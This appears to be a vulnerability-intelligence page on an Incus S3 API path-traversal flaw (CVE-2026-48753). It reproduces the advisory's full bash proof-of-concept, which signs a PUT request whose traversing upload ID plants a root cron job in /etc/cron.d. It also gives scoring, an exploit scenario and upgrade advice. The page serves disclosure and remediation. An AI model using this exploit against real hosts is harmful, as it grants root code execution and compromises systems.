Incus CVE-2026-48753
CRITICALSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Network-reachable S3 API with low complexity but mandatory bucket credentials (PR:L); host file write escapes the storage sandbox (S:C) and enables root RCE, giving full C/I/A:H.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The S3 protocol upload endpoint is vulnerable to path traversal and allows creation of arbitrary files on the host. This behavior could lead to arbitrary command execution.
In internal/server/storage/s3/local/multipart.go, user-controlled upload ID is appended to the uploads directory unsanitized; https://github.com/lxc/incus/blob/40dd4f151d52c06b178482aa2518abfb9df3e6fb/internal/server/storage/s3/local/multipart.go#L33
PoC
Setup
# Expose the S3 API and create a bucket
incus config set core.storage_buckets_address=:8555
incus storage volume create default bucket
#> note the credentialsExploitation
The below script was mostly generated.
#!/usr/bin/env bash
set -euo pipefail
if [ $
# -lt 4 ]; then
printf 'usage: $0 endpoint bucket access-key secret-key\n' >&2
exit 1
fi
endpoint="${1%/}"
bucket="${2}"
access="${3}"
secret="${4}"
region="us-east-1"
service="s3"
key="anything"
part="1"
upload_id="../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/cron.d"
target="/etc/cron.d/part-00001"
cmd="id > /incus-s3-uploadid-bash-rce; rm -f $target"
body="* * * * * root /bin/sh -c '$cmd'
"
uri_path="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://[^/]+##')/$bucket/$key"
uri_path="${uri_path#/}"
uri_path="/$uri_path"
host="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://([^/]+).*#\1#')"
qs="partNumber=$part&uploadId=${upload_id//\//%2F}"
url="$endpoint/$bucket/$key?$qs"
amz_date=$(date -u +%Y%m%dT%H%M%SZ)
date_scope="${amz_date:0:8}"
scope="$date_scope/$region/$service/aws4_request"
body_hash=$(printf '%s' "$body" | sha256sum | awk '{print $1}')
signed="host;x-amz-content-sha256;x-amz-date"
canonical="PUT
$uri_path
$qs
host:$host
x-amz-content-sha256:$body_hash
x-amz-date:$amz_date
$signed
$body_hash"
canonical_hash="$(printf '%s' "$canonical" | sha256sum | awk '{print $1}')"
string_to_sign="AWS4-HMAC-SHA256
$amz_date
$scope
$canonical_hash"
hmac_hex() {
printf '%s' "${2}" | openssl dgst -sha256 -mac HMAC -macopt "hexkey:${1}" -binary | xxd -p -c 256
}
k_date=$(printf 'AWS4%s' "$secret" | xxd -p -c 256)
k_date=$(hmac_hex "$k_date" "$date_scope")
k_region=$(hmac_hex "$k_date" "$region")
k_service=$(hmac_hex "$k_region" "$service")
k_signing=$(hmac_hex "$k_service" "aws4_request")
sig=$(hmac_hex "$k_signing" "$string_to_sign")
auth="AWS4-HMAC-SHA256 Credential=${access}/${scope},SignedHeaders=${signed},Signature=${sig}"
printf '
# body:\n%s' "${body}"
curl -ksS -X PUT "${url}" \
-H "Host: ${host}" \
-H "X-Amz-Date: ${amz_date}" \
-H "X-Amz-Content-Sha256: ${body_hash}" \
-H "Authorization: ${auth}" \
--data-binary "${body}"Impact
Arbitrary file write on the host. Possibly leading to arbitrary command execution.
Articles & Coverage 1
AnalysisAI
Arbitrary host file write in Incus before 7.1.0 lets a holder of S3 bucket credentials escape the storage volume via a path-traversal-laden multipart upload ID and plant files anywhere the daemon (typically root) can write, escalating to remote code execution. The flaw lives in the local S3 storage backend's multipart upload handling, where the attacker-supplied uploadId is concatenated onto the uploads directory without sanitization. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires three concrete preconditions taken from the description and PoC: (1) the Incus S3 API must be explicitly enabled via core.storage_buckets_address (off by default), (2) at least one storage bucket must exist, and (3) the attacker must hold valid bucket access-key/secret-key credentials to produce a SigV4-signed request (PR:L - authenticated). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, base 9.9) reflects a low-complexity, network-reachable attack that nonetheless requires some privilege (PR:L) - specifically valid S3 bucket credentials - and produces a scope change (writing host files outside the storage sandbox). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has been issued (or has stolen) S3 access/secret keys for any Incus bucket sends a signed PUT multipart-upload request whose uploadId is a long '../../../etc/cron.d' traversal string, causing the uploaded part body to be written as /etc/cron.d/part-00001. The cron file runs an attacker command as root on the next schedule tick, yielding host compromise. … |
| Remediation | Upgrade to Incus 7.1.0 or later, which contains the fix - Vendor-released patch: 7.1.0 (see advisory GHSA-ccjc-4qc3-jxqc at https://github.com/lxc/incus/security/advisories/GHSA-ccjc-4qc3-jxqc). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all Incus deployments with S3 storage backend on versions before 7.1.0; disable S3 storage or isolate systems from untrusted networks; audit S3 credential usage in access logs. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to exec
OpenSSL has a critical out-of-bounds write when parsing CMS AuthEnvelopedData/EnvelopedData with malicious AEAD paramete
During login to the web server in "Sante PACS Server.exe", OpenSSL function EVP_DecryptUpdate is called to decrypt the u
Unauthenticated arbitrary file upload in WPvivid Backup & Migration WordPress plugin. EPSS 0.44%.
Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.893 and Application versions prior to
Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.1002 and Application versions prior t
OpenSSL and Microsoft products using the 'DEFAULT' keyword in TLS 1.3 key exchange group configurations may negotiate we
Adminer versions 5.4.1 and earlier suffer from a post-message validation bypass that allows remote attackers to trigger
Privilege escalation to AWS IAM and PKI compromise in Netflix Lemur 1.9.0 (and earlier) lets any SSO-authenticated, low-
Authentication bypass in LizardByte Sunshine self-hosted game stream host (versions prior to 2026.516.143833) allows rem
Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflo
Heap out-of-bounds write in the Crypt::OpenSSL::PKCS12 Perl module (versions up to and including 1.94) allows attackers
Same weakness CWE-73 – External Control of File Name or Path
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-ccjc-4qc3-jxqc